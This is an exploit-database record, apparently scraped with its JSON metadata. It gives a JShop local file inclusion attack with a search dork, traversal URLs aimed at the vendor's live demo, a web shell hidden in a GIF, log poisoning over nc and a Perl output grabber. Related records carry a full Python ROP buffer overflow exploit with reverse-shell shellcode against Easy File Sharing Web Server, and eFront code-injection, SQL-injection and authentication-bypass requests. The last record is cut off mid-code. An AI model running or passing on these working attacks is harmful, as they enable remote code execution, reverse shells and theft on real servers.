JShop 1.x - 2.x (page.php xPage) Local File Inclusion Vulnerability
2008-03-30T00:00:00
ID 1337DAY-ID-2788 Type zdt Reporter v0l4arrra Modified 2008-03-30T00:00:00
Description
Exploit for unknown platform in category web applications
===================================================================
JShop 1.x - 2.x (page.php xPage) Local File Inclusion Vulnerability
===================================================================
JShop 1.x-2.x local file include
---------------------------------------------------------------------------------------------------------------------
+ scripts: Jshop Server 1.x-2.x +
+ Discovered By : v0l4arrra +
+ url: www.jshop.co.uk +
+ dork: "powered by jshop" and also usefull one "allinurl:jssCart=.." +
---------------------------------------------------------------------------------------------------------------------
Go to www.jshop.co.uk and check out demo version...
http://www.jshopecommerce.com/v2demo/page.php?xPage=../../../../../../../../../../../../../etc/passwd%00
Then u can upload for example the gif file like this
$cat 1.gif
GIF89aD
<?php echo system($_GET['cmd']); ?>
or do it like me:
$nc www.jshopecommerce.com 80
GET <?php echo '<start>'; echo system($_GET['cmd']); echo '</start>'; ?> HTTP/1.1
Host: www.jshopecommerce.com
................................................................................................................
and simple parse the output of error log with lame perl script:
#!/usr/bin/env perl
use strict; use warnings;
#####################################
# This script download log file #
# and grep the result of the #
# command in tags <start>..</start> #
# and print it.. #
#####################################
use LWP::UserAgent;
use HTTP::Request::Common;
$| = 1;
my $url = $ARGV[0] or print "usage: $0 http://127.0.0.1/vuln.php?page=../../../../../var/log/access.log%00&cmd=ls+-lisa\n" and exit;
my $ua= new LWP::UserAgent;
$ua->agent("Mozilla/5.0");
my $request = new HTTP::Request( 'GET' => $url );
my $document = $ua->request($request);
my $response = $document->as_string;
$response =~ m%<start>(.*?)</start>%is;
print $1,"\n";
######################################
so dont waste your time and check it now
http://www.jshopecommerce.com/v2demo/page.php?xPage=../../../../../../../../../../etc/httpd/logs/error_log%00&cmd=ls+-lisa
##########################################
# 0day.today [2018-03-19] #
{"published": "2008-03-30T00:00:00", "id": "1337DAY-ID-2788", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T10:01:34", "bulletin": {"published": "2008-03-30T00:00:00", "id": "1337DAY-ID-2788", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 3.3, "modified": "2016-04-19T10:01:34", "vector": "AV:N/AC:L/Au:M/C:N/I:P/A:N/"}}, "hash": "fb51fb69c89001cba845a5def2341c6e449137377c3a26a100b77e1f69bbd48f", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T10:01:34", "edition": 1, "title": "JShop 1.x - 2.x (page.php xPage) Local File Inclusion Vulnerability", "href": "http://0day.today/exploit/description/2788", "modified": "2008-03-30T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/2788", "references": [], "reporter": "v0l4arrra", "sourceData": "===================================================================\r\nJShop 1.x - 2.x (page.php xPage) Local File Inclusion Vulnerability\r\n===================================================================\r\n\r\n\r\n\r\nJShop 1.x-2.x local file include\r\n---------------------------------------------------------------------------------------------------------------------\r\n+ scripts:\tJshop Server 1.x-2.x +\r\n+ Discovered By :\tv0l4arrra +\r\n+ url:\t www.jshop.co.uk +\r\n+ dork:\t\"powered by jshop\" and also usefull one \"allinurl:jssCart=..\" +\r\n---------------------------------------------------------------------------------------------------------------------\r\nGo to www.jshop.co.uk and check out demo version...\r\n\r\nhttp://www.jshopecommerce.com/v2demo/page.php?xPage=../../../../../../../../../../../../../etc/passwd%00\r\n\r\nThen u can upload for example the gif file like this \r\n\r\n$cat 1.gif\r\nGIF89aD\r\n<?php echo system($_GET['cmd']); ?>\r\n\r\nor do it like me:\r\n$nc www.jshopecommerce.com 80\r\nGET <?php echo '<start>'; echo system($_GET['cmd']); echo '</start>'; ?> HTTP/1.1\r\nHost: www.jshopecommerce.com\r\n\r\n................................................................................................................\r\nand simple parse the output of error log with lame perl script:\r\n\r\n#!/usr/bin/env perl\r\nuse strict; use warnings;\r\n\r\n#####################################\r\n# This script download log file #\r\n# and grep the result of the #\r\n# command in tags <start>..</start> #\r\n# and print it.. #\r\n#####################################\r\n\r\nuse LWP::UserAgent;\r\nuse HTTP::Request::Common;\r\n\r\n$| = 1;\r\n\r\nmy $url = $ARGV[0] or print \"usage: $0 http://127.0.0.1/vuln.php?page=../../../../../var/log/access.log%00&cmd=ls+-lisa\\n\" and exit;\r\nmy $ua= new LWP::UserAgent;\r\n$ua->agent(\"Mozilla/5.0\");\r\nmy $request = new HTTP::Request( 'GET' => $url );\r\nmy $document = $ua->request($request);\r\nmy $response = $document->as_string;\r\n$response =~ m%<start>(.*?)</start>%is;\r\nprint $1,\"\\n\";\r\n\r\n######################################\r\n\r\nso dont waste your time and check it now\r\nhttp://www.jshopecommerce.com/v2demo/page.php?xPage=../../../../../../../../../../etc/httpd/logs/error_log%00&cmd=ls+-lisa\r\n\r\n##########################################\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "33c53cd447cf4967247385ab6189d7b5", "key": "reporter"}, {"hash": "30925bc1c256f83a6ab7c4c90ed8cebc", "key": "modified"}, {"hash": "d139eea10c0847b0dca804081d02c428", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "34f688581e116a8a43c5b71e013dd701", "key": "sourceData"}, {"hash": "00f76115ab6c2d46d8c57b83965c5ef5", "key": "title"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "30925bc1c256f83a6ab7c4c90ed8cebc", "key": "published"}, {"hash": "3990927479ef2e85dec6215b69b623fa", "key": "sourceHref"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "967ec3ac4581be22dd6895c0f467b0fcb61c992e7cade78ade14fec5b78c8b4f", "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "vulnersScore": 9.3}, "type": "zdt", "lastseen": "2018-03-20T00:18:28", "edition": 2, "title": "JShop 1.x - 2.x (page.php xPage) Local File Inclusion Vulnerability", "href": "https://0day.today/exploit/description/2788", "modified": "2008-03-30T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "https://0day.today/exploit/2788", "references": [], "reporter": "v0l4arrra", "sourceData": "===================================================================\r\nJShop 1.x - 2.x (page.php xPage) Local File Inclusion Vulnerability\r\n===================================================================\r\n\r\n\r\n\r\nJShop 1.x-2.x local file include\r\n---------------------------------------------------------------------------------------------------------------------\r\n+ scripts:\tJshop Server 1.x-2.x +\r\n+ Discovered By :\tv0l4arrra +\r\n+ url:\t www.jshop.co.uk +\r\n+ dork:\t\"powered by jshop\" and also usefull one \"allinurl:jssCart=..\" +\r\n---------------------------------------------------------------------------------------------------------------------\r\nGo to www.jshop.co.uk and check out demo version...\r\n\r\nhttp://www.jshopecommerce.com/v2demo/page.php?xPage=../../../../../../../../../../../../../etc/passwd%00\r\n\r\nThen u can upload for example the gif file like this \r\n\r\n$cat 1.gif\r\nGIF89aD\r\n<?php echo system($_GET['cmd']); ?>\r\n\r\nor do it like me:\r\n$nc www.jshopecommerce.com 80\r\nGET <?php echo '<start>'; echo system($_GET['cmd']); echo '</start>'; ?> HTTP/1.1\r\nHost: www.jshopecommerce.com\r\n\r\n................................................................................................................\r\nand simple parse the output of error log with lame perl script:\r\n\r\n#!/usr/bin/env perl\r\nuse strict; use warnings;\r\n\r\n#####################################\r\n# This script download log file #\r\n# and grep the result of the #\r\n# command in tags <start>..</start> #\r\n# and print it.. #\r\n#####################################\r\n\r\nuse LWP::UserAgent;\r\nuse HTTP::Request::Common;\r\n\r\n$| = 1;\r\n\r\nmy $url = $ARGV[0] or print \"usage: $0 http://127.0.0.1/vuln.php?page=../../../../../var/log/access.log%00&cmd=ls+-lisa\\n\" and exit;\r\nmy $ua= new LWP::UserAgent;\r\n$ua->agent(\"Mozilla/5.0\");\r\nmy $request = new HTTP::Request( 'GET' => $url );\r\nmy $document = $ua->request($request);\r\nmy $response = $document->as_string;\r\n$response =~ m%<start>(.*?)</start>%is;\r\nprint $1,\"\\n\";\r\n\r\n######################################\r\n\r\nso dont waste your time and check it now\r\nhttp://www.jshopecommerce.com/v2demo/page.php?xPage=../../../../../../../../../../etc/httpd/logs/error_log%00&cmd=ls+-lisa\r\n\r\n##########################################\r\n\r\n\r\n\n# 0day.today [2018-03-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "07195a5298d716a3bfb8f7567abe98ef", "key": "href"}, {"hash": "30925bc1c256f83a6ab7c4c90ed8cebc", "key": "modified"}, {"hash": "30925bc1c256f83a6ab7c4c90ed8cebc", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "33c53cd447cf4967247385ab6189d7b5", "key": "reporter"}, {"hash": "b2c7b8928cca307133786e20dc37c318", "key": "sourceData"}, {"hash": "13ded3358aae77c1f34401ffd65f74bb", "key": "sourceHref"}, {"hash": "00f76115ab6c2d46d8c57b83965c5ef5", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2018-04-03T15:33:56", "references": [], "description": "Exploit for windows platform in category remote exploits", "edition": 1, "reporter": "Sungchul Park", "published": "2017-07-09T00:00:00", "type": "zdt", "title": "Easy File Sharing Web Server 7.2 - GET HTTP Request PassWD Buffer Overflow (DEP Bypass) Exploit", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-07-09T00:00:00", "href": "https://0day.today/exploit/description/28102", "id": "1337DAY-ID-28102", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: Easy File Sharing Web Server 7.2 - GET Buffer Overflow (DEP Bypass with ROP)\r\n# Date: 8 July 2017\r\n# Exploit Author: Sungchul Park\r\n# Author Contact: [email\u00a0protected]\r\n# Vendor Homepage: http://www.sharing-file.com\r\n# Software Link: http://www.sharing-file.com/efssetup.exe\r\n# Version: Easy File Sharing Web Server 7.2\r\n# Tested on: Winows 7 SP1\r\n \r\nimport socket, struct\r\n \r\ndef create_rop_chain():\r\n \r\n # rop chain generated with mona.py - www.corelan.be\r\n rop_gadgets = [\r\n # For EDX -> flAllocationType(0x1000) [ EAX to EBX ]\r\n # 0x00000000, # [-] Unable to find gadget to put 00001000 into edx\r\n 0x10015442, # POP EAX # RETN [ImageLoad.dll]\r\n 0xFFFFEFFF, # -1001 (static value)\r\n 0x100231d1, # NEG EAX # RETN [ImageLoad.dll]\r\n 0x1001614d, # DEC EAX # RETN [ImageLoad.dll] \r\n 0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]\r\n 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]\r\n 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]\r\n 0x10015442, # POP EAX # RETN [ImageLoad.dll]\r\n 0x1004de84, # &Writable location [ImageLoad.dll]\r\n \r\n # For EDX -> flAllocationType(0x1000) [ EBX to EDX ]\r\n 0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll]\r\n 0x10022c1e, # ADD EDX,EBX # POP EBX # RETN 0x10 [ImageLoad.dll] \r\n 0xffffffff, # Filler (Compensation for POP EBX)\r\n \r\n # For ESI -> &VirtualAlloc\r\n 0x10015442, # POP EAX # RETN [ImageLoad.dll] \r\n 0xffffffff, # Filler \\\r\n 0xffffffff, # Filler |\r\n 0xffffffff, # Filler | => (Compensation for RETN 0x10)\r\n 0xffffffff, # Filler /\r\n 0x1004d1fc, # ptr to &VirtualAlloc() [IAT ImageLoad.dll]\r\n 0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] \r\n 0x61c0a798, # XCHG EAX,EDI # RETN [sqlite3.dll] \r\n 0x1001aeb4, # POP ESI # RETN [ImageLoad.dll] \r\n 0xffffffff, # \r\n 0x1001715d, # INC ESI # ADD AL,3A # RETN [ImageLoad.dll] \r\n 0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] \r\n \r\n # For EBP -> Return Address\r\n 0x10013860, # POP EBP # RETN [ImageLoad.dll] \r\n 0x61c24169, # & push esp # ret [sqlite3.dll]\r\n \r\n # For EBX -> dwSize(0x01)\r\n 0x100132ba, # POP EBX # RETN [ImageLoad.dll] \r\n 0xffffffff, # \r\n 0x61c2785d, # INC EBX # ADD AL,83 # RETN [sqlite3.dll] \r\n 0x1001f6da, # INC EBX # ADD AL,83 # RETN [ImageLoad.dll] \r\n \r\n # For ECX -> flProtect(0x40)\r\n 0x10019dfa, # POP ECX # RETN [ImageLoad.dll] \r\n 0xffffffff, # \r\n 0x61c68081, # INC ECX # ADD AL,39 # RETN [sqlite3.dll] \r\n 0x61c68081, # INC ECX # ADD AL,39 # RETN [sqlite3.dll] \r\n 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll]\r\n 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll]\r\n 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll]\r\n 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll]\r\n 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll]\r\n 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll]\r\n \r\n # For EDI -> ROP NOP\r\n 0x61c373a4, # POP EDI # RETN [sqlite3.dll] \r\n 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]\r\n # For EAX -> NOP(0x90)\r\n 0x10015442, # POP EAX # RETN [ImageLoad.dll] \r\n 0x90909090, # nop\r\n 0x100240c2, # PUSHAD # RETN [ImageLoad.dll] \r\n ]\r\n return ''.join(struct.pack('<I', _) for _ in rop_gadgets)\r\n \r\nrop_chain = create_rop_chain()\r\n \r\n# msfvenom -p windows/shell/reverse_tcp LHOST=192.168.44.128 LPORT=8585 -b \"\\x00\\x3b\" -e x86/shikata_ga_nai -f python -v shellcode\r\nshellcode = \"\\x90\"*200\r\nshellcode += \"\\xdb\\xdd\\xbb\\x5e\\x78\\x34\\xc0\\xd9\\x74\\x24\\xf4\\x5e\"\r\nshellcode += \"\\x29\\xc9\\xb1\\x54\\x31\\x5e\\x18\\x03\\x5e\\x18\\x83\\xc6\"\r\nshellcode += \"\\x5a\\x9a\\xc1\\x3c\\x8a\\xd8\\x2a\\xbd\\x4a\\xbd\\xa3\\x58\"\r\nshellcode += \"\\x7b\\xfd\\xd0\\x29\\x2b\\xcd\\x93\\x7c\\xc7\\xa6\\xf6\\x94\"\r\nshellcode += \"\\x5c\\xca\\xde\\x9b\\xd5\\x61\\x39\\x95\\xe6\\xda\\x79\\xb4\"\r\nshellcode += \"\\x64\\x21\\xae\\x16\\x55\\xea\\xa3\\x57\\x92\\x17\\x49\\x05\"\r\nshellcode += \"\\x4b\\x53\\xfc\\xba\\xf8\\x29\\x3d\\x30\\xb2\\xbc\\x45\\xa5\"\r\nshellcode += \"\\x02\\xbe\\x64\\x78\\x19\\x99\\xa6\\x7a\\xce\\x91\\xee\\x64\"\r\nshellcode += \"\\x13\\x9f\\xb9\\x1f\\xe7\\x6b\\x38\\xf6\\x36\\x93\\x97\\x37\"\r\nshellcode += \"\\xf7\\x66\\xe9\\x70\\x3f\\x99\\x9c\\x88\\x3c\\x24\\xa7\\x4e\"\r\nshellcode += \"\\x3f\\xf2\\x22\\x55\\xe7\\x71\\x94\\xb1\\x16\\x55\\x43\\x31\"\r\nshellcode += \"\\x14\\x12\\x07\\x1d\\x38\\xa5\\xc4\\x15\\x44\\x2e\\xeb\\xf9\"\r\nshellcode += \"\\xcd\\x74\\xc8\\xdd\\x96\\x2f\\x71\\x47\\x72\\x81\\x8e\\x97\"\r\nshellcode += \"\\xdd\\x7e\\x2b\\xd3\\xf3\\x6b\\x46\\xbe\\x9b\\x58\\x6b\\x41\"\r\nshellcode += \"\\x5b\\xf7\\xfc\\x32\\x69\\x58\\x57\\xdd\\xc1\\x11\\x71\\x1a\"\r\nshellcode += \"\\x26\\x08\\xc5\\xb4\\xd9\\xb3\\x36\\x9c\\x1d\\xe7\\x66\\xb6\"\r\nshellcode += \"\\xb4\\x88\\xec\\x46\\x39\\x5d\\x98\\x43\\xad\\x9e\\xf5\\x60\"\r\nshellcode += \"\\xad\\x77\\x04\\x79\\x8c\\x0e\\x81\\x9f\\x9e\\x40\\xc2\\x0f\"\r\nshellcode += \"\\x5e\\x31\\xa2\\xff\\x36\\x5b\\x2d\\xdf\\x26\\x64\\xe7\\x48\"\r\nshellcode += \"\\xcc\\x8b\\x5e\\x20\\x78\\x35\\xfb\\xba\\x19\\xba\\xd1\\xc6\"\r\nshellcode += \"\\x19\\x30\\xd0\\x37\\xd7\\xb1\\x91\\x2b\\x0f\\xa0\\x59\\xb4\"\r\nshellcode += \"\\xcf\\x49\\x5a\\xde\\xcb\\xdb\\x0d\\x76\\xd1\\x3a\\x79\\xd9\"\r\nshellcode += \"\\x2a\\x69\\xf9\\x1e\\xd4\\xec\\xc8\\x55\\xe2\\x7a\\x75\\x02\"\r\nshellcode += \"\\x0a\\x6b\\x75\\xd2\\x5c\\xe1\\x75\\xba\\x38\\x51\\x26\\xdf\"\r\nshellcode += \"\\x47\\x4c\\x5a\\x4c\\xdd\\x6f\\x0b\\x20\\x76\\x18\\xb1\\x1f\"\r\nshellcode += \"\\xb0\\x87\\x4a\\x4a\\xc3\\xc0\\xb5\\x08\\xe1\\x68\\xde\\xf2\"\r\nshellcode += \"\\xa5\\x88\\x1e\\x99\\x25\\xd9\\x76\\x56\\x0a\\xd6\\xb6\\x97\"\r\nshellcode += \"\\x81\\xbf\\xde\\x12\\x47\\x0d\\x7e\\x22\\x42\\xd3\\xde\\x23\"\r\nshellcode += \"\\x60\\xc8\\x37\\xaa\\x87\\xef\\x37\\x4c\\xb4\\x39\\x0e\\x3a\"\r\nshellcode += \"\\xfd\\xf9\\x35\\x35\\xb4\\x5c\\x1f\\xdc\\xb6\\xf3\\x5f\\xf5\"\r\n \r\n \r\nhost = \"192.168.44.139\"\r\nport = 80\r\n \r\nmax_size = 4000\r\nseh_offset = 57\r\neax_offset = 73\r\nrop_offset = 2788\r\n \r\nbuffer = \"A\" * seh_offset # padding\r\nbuffer += \"BBBB\" # nSEH Pointer\r\nbuffer += struct.pack(\"<I\", 0x1002280a) # SE Handler with stack pivot(# ADD ESP,1004 # RETN [ImageLoad.dll])\r\nbuffer += \"A\" * (eax_offset - len(buffer)) # padding\r\nbuffer += \"DDDD\" # EAX overwrite\r\nbuffer += \"C\" * rop_offset\r\nbuffer += rop_chain\r\nbuffer += shellcode\r\nbuffer += \"B\" * (max_size - len(buffer)) # padding\r\n \r\n# HTTP GET Request\r\nrequest = \"GET /vfolder.ghp HTTP/1.1\\r\\n\"\r\nrequest += \"Host: \" + host + \"\\r\\n\"\r\nrequest += \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36\" + \"\\r\\n\"\r\nrequest += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\" + \"\\r\\n\"\r\nrequest += \"Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4\" + \"\\r\\n\"\r\nrequest += \"Cookie: SESSIONID=3672; UserID=PassWD=\" + buffer + \"; frmUserName=; frmUserPass=;\"\r\nrequest += \"\\r\\n\"\r\nrequest += \"Connection: keep-alive\" + \"\\r\\n\"\r\nrequest += \"If-Modified-Since: Thu, 06 Jul 2017 14:12:13 GMT\" + \"\\r\\n\"\r\n \r\ns=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n \r\nconnect=s.connect((host, port))\r\n \r\ns.send(request + \"\\r\\n\\r\\n\")\r\ns.close()\n\n# 0day.today [2018-04-03] #", "sourceHref": "https://0day.today/exploit/28102", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-04T17:13:17", "references": [], "description": "Exploit for php platform in category web applications", "edition": 2, "reporter": "EgiX", "published": "2011-10-26T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "eFront <= 3.6.10 (build 11944) Multiple Security Vulnerabilities", "bulletinFamily": "exploit", "cvelist": [], "modified": "2011-10-26T00:00:00", "id": "1337DAY-ID-17028", "href": "https://0day.today/exploit/description/17028", "sourceData": "----------------------------------------------------------------\r\neFront <= 3.6.10 (build 11944) Multiple Security Vulnerabilities\r\n----------------------------------------------------------------\r\n \r\nauthor.............: EgiX\r\nmail...............: n0b0d13s[at]gmail[dot]com\r\nsoftware link......: http://www.efrontlearning.net/\r\ntested versions....: 3.6.7 - 3.6.9 - 3.6.10\r\n \r\n+-----------------------+\r\n| Remote Code Execution |\r\n+-----------------------+\r\n \r\nThe vulnerable code is located in /www/editor/tiny_mce/plugins/save_template/save_template.php\r\n \r\n8. if ($_POST['templateName']) {\r\n9. $dir = '../../../../content/editor_templates/'.$_SESSION['s_login'];\r\n10. if (!is_dir($dir) && !mkdir($dir, 0755)) {\r\n11. throw new Exception(_COULDNOTCREATEDIRECTORY);\r\n12. }\r\n13. \r\n14. $filename = $dir.'/'.$_POST['templateName'].'.html';\r\n15. $templateContent = $_POST['templateContent'];\r\n16. if(file_exists($filename) === false) {\r\n17. $ok = file_put_contents($filename, $templateContent);\r\n18. chmod($filename, 0644);\r\n \r\nInput passed through $_POST['templateName'] and $_POST['templateContent'] isn't sanitized before being\r\nused in a call to file_put_contents() at line 17, this can be exploited to write arbitrary PHP code in\r\na file with .php extension also if magic_quotes_gpc = on. Proof of concept request:\r\n \r\n POST /efront/www/editor/tiny_mce/plugins/save_template/save_template.php HTTP/1.1\r\n Host: localhost\r\n Content-Length: 60\r\n Content-Type: application/x-www-form-urlencoded\r\n Connection: keep-alive\r\n \r\n templateName=sh.php%00&templateContent=<?php evil_code(); ?>\r\n \r\nSuccessful exploitation of this vulnerability doesn't require authentication.\r\n \r\n+--------------------------+\r\n| Unrestricted File Upload |\r\n+--------------------------+\r\n \r\nThe vulnerable code is located in /libraries/filesystem.class.php\r\n \r\n3143. public static function checkFile($name) {\r\n3144. if ($GLOBALS['configuration']['file_black_list'] != '') {\r\n3145. $blackList = explode(\",\", $GLOBALS['configuration']['file_black_list']);\r\n3146. } else {\r\n3147. $blackList = array();\r\n3148. }\r\n3149. $blackList[] = 'php';\r\n3150. $extension = pathinfo($name, PATHINFO_EXTENSION);\r\n3151. foreach ($blackList as $value) {\r\n3152. if ($extension == trim(mb_strtolower($value))) {\r\n3153. throw new EfrontFileException(_YOUCANNOTUPLOADFILESWITHTHISEXTENSION.': '.$extension, EfrontFileException::FILE_IN_BLACK_LIST);\r\n3154. }\r\n \r\nThe FileSystemTree::uploadFile() method handles all uploads and It uses checkFile() method to verify the extension\r\nof the uploaded file. Here is compared the uploaded file extension with every extension in the 'file_black_list' array,\r\nthat is constructed by this default configuration: \"php,php3,jsp,asp,cgi,pl,exe,com,bat\" and, as you can see, It doesn't\r\ncontains others dangerous extension like phtml, pwml, php4, php5, inc... But the really problem is that at line 3152\r\nthe uploaded file extension is simply compared with == operator, so an attacker could be able to upload for e.g. an\r\navatar with .PHP extension. This is possible only if 'file_white_list' configuration is blank (such as by default).\r\n \r\n+-----------------------------------+\r\n| SQL Injection in UPDATE statement |\r\n+-----------------------------------+\r\n \r\nFirst look at the getUserTimeTarget() function defined into /libraries/tools.php\r\n \r\n2776. function getUserTimeTarget($url) {\r\n2777. //return $_SESSION['s_time_target'];\r\n2778. if (isset($_SESSION['s_lessons_ID']) && $_SESSION['s_lessons_ID']) {\r\n2779. $entity = array($_SESSION['s_lessons_ID'] => 'lesson');\r\n2780. } else {\r\n2781. $entity = array(0 => 'system');\r\n2782. }\r\n2783. $urlParts = parse_url($url);\r\n2784. $queryParts = explode('&', $urlParts['query']);\r\n2785. foreach($queryParts as $part) {\r\n2786. $result = explode(\"=\", $part);\r\n2787. switch ($result[0]) {\r\n2788. case 'view_unit':\r\n2789. case 'package_ID': $entity = array($result[1] => 'unit'); break;\r\n2790. default: break;\r\n2791. }\r\n2792. }\r\n2793. return $entity;\r\n2794. }\r\n \r\nIt parses the given URL, and if in the query string is defined a 'package_ID' variable his content is\r\nused as a key for the $entity array. Now look the vulnerable code located in /www/periodic_updater.php\r\n \r\n32. if ($_SESSION['s_login']) {\r\n33. $entity = getUserTimeTarget($_GET['HTTP_REFERER']);\r\n34. //$entity = $_SESSION['s_time_target'];\r\n35. //Update times for this entity\r\n36. $result = eF_executeNew(\"update user_times set time=time+(\".time().\"-timestamp_now),timestamp_now=\".time().\"\r\n37. where session_expired = 0 and session_custom_identifier = '\".$_SESSION['s_custom_identifier'].\"' and users_LOGIN = '\".$_SESSION['s_login'].\"'\r\n38. and entity = '\".current($entity).\"' and entity_id = '\".key($entity).\"'\");\r\n \r\nInput passed through $_GET['HTTP_REFERER'] is passed to getUserTimeTarget() function at line 33 and the return value is\r\nused in call to eF_executeNew() at line 38. So an attacker could request an URL like this to inject arbitrary SQL code:\r\n \r\n http://localhost/efront/www/periodic_updater.php?HTTP_REFERER=http://host/?package_ID=[SQL]\r\n \r\nIn older version input is taken from $_SERVER['HTTP_REFERER'] instead of $_GET['HTTP_REFERER'], but is still vulnerable.\r\nSuccessful exploitation of this vulnerability requires authentication.\r\n \r\n+---------------+\r\n| SQL Injection |\r\n+---------------+\r\n \r\nThe vulnerable code is located in /www/js/LMSFunctions.php\r\n \r\n13. /*These lines read SCO data for this student and pass them to the javascript code through the LMSToSCOValues variable*/\r\n14. $result = eF_getTableData(\"scorm_data\", \"*\", \"users_LOGIN = '\".$_SESSION['s_login'].\"' AND content_ID = '\".$_GET['view_unit'].\"'\");\r\n15. sizeof($result) ? $LMSToSCOValues = $result[0] : $LMSToSCOValues = array();\r\n \r\nInput passed through $_GET['view_unit'] isn't properly sanitized before being used in a call\r\nto eF_getTableData() function at line 14, this can be exploited to inject arbitrary SQL code.\r\nSuccessful exploitation of this vulnerability doesn't require authentication or magic_quotes_gpc = off.\r\n \r\n+---------------+\r\n| SQL Injection |\r\n+---------------+\r\n \r\nThe vulnerable code is located in /www/send_notifications.php\r\n \r\n69. } else if (isset($_GET['sent_notification_id'])) {\r\n70. $sent_notification = eF_getTableData(\"sent_notifications\", \"*\", \"id = \" . $_GET['sent_notification_id']);\r\n71. if (!empty ($sent_notification)) {\r\n \r\nInput passed through $_GET['sent_notification_id'] isn't properly sanitized before being used in a\r\ncall to eF_getTableData() function at line 70, this can be exploited to inject arbitrary SQL code.\r\nSuccessful exploitation of this vulnerability doesn't require authentication or magic_quotes_gpc = off.\r\n \r\n+------------------------------------------------+\r\n| Authentication Bypass and Privilege Escalation |\r\n+------------------------------------------------+\r\n \r\nThe vulnerable code is located in /www/index.php\r\n \r\n206. if (isset($_COOKIE['cookie_login']) && isset($_COOKIE['cookie_password'])) {\r\n207. try {\r\n208. $user = EfrontUserFactory :: factory($_COOKIE['cookie_login']);\r\n209. $user -> login($_COOKIE['cookie_password'], true);\r\n \r\nInput passed through $_COOKIE['cookie_login'] isn't properly sanitized before being used at\r\nline 208 to instanciate a new user object using EfrontUserFactory::factory() method, this can\r\nbe exploited to bypass authentication and to escalate privilege. Proof of concept request:\r\n \r\n GET /efront/www/index.php HTTP/1.1\r\n Host: localhost\r\n Cookie: cookie_login[login]=admin;cookie_login[active]=1;cookie_login[user_type]=administrator;cookie_login[password]=1;cookie_password=1\r\n Connection: keep-alive\r\n \r\n+--------------------+\r\n| PHP Code Injection |\r\n+--------------------+\r\n \r\nThe vulnerable code is located in /www/student.php\r\n \r\n123. if (isset($_GET['course']) || isset($_GET['from_course'])) {\r\n124. if ($_GET['course']) {\r\n125. $course = new EfrontCourse($_GET['course']);\r\n126. } else {\r\n127. $course = new EfrontCourse($_GET['from_course']);\r\n128. }\r\n129. $eligibility = $course -> checkRules($_SESSION['s_login']);\r\n \r\nInput passed through $_GET['course'] (or $_GET['from_course']) isn't properly sanitized before being\r\nused to instantiate a new EfrontCourse object, this can be exploited to inject and execute arbitrary\r\nPHP code because of EfrontCourse::checkRules() method calls eval() function using the 'rules' object's\r\nproperty (see /libraries/course.class.php near lines 3638-3645). Successful exploitation of this\r\nvulnerability requires at least a student account with at least one completed lesson.\r\nProof of concept request:\r\n \r\n /student.php?lessons_ID=1&course[id]=1&course[directions_ID]=1&course[rules]=a:1:{s:19:\"1];phpinfo();die;/*\";a:1:{s:6:\"lesson\";i:0;}}\r\n \r\n \r\n[-] Conclusion:\r\n \r\nThe latest two vulnerabilities emphasizes a critical design flaw. To understand what I means look\r\nat the constructor method of EfrontEntity (a generic class used as parent for some objects):\r\n \r\n64. public function __construct($param) {\r\n65. if (!$this -> entity) {\r\n66. $this -> entity = strtolower(str_replace('Efront', '', get_class($this)));\r\n67. }\r\n68. if (!is_array($param)) {\r\n69. if (!eF_checkParameter($param, 'id')) {\r\n70. throw new EfrontEntityException(_INVALIDID.': '.$param, EfrontEntityException :: INVALID_ID);\r\n71. }\r\n72. $result = eF_getTableData($this -> 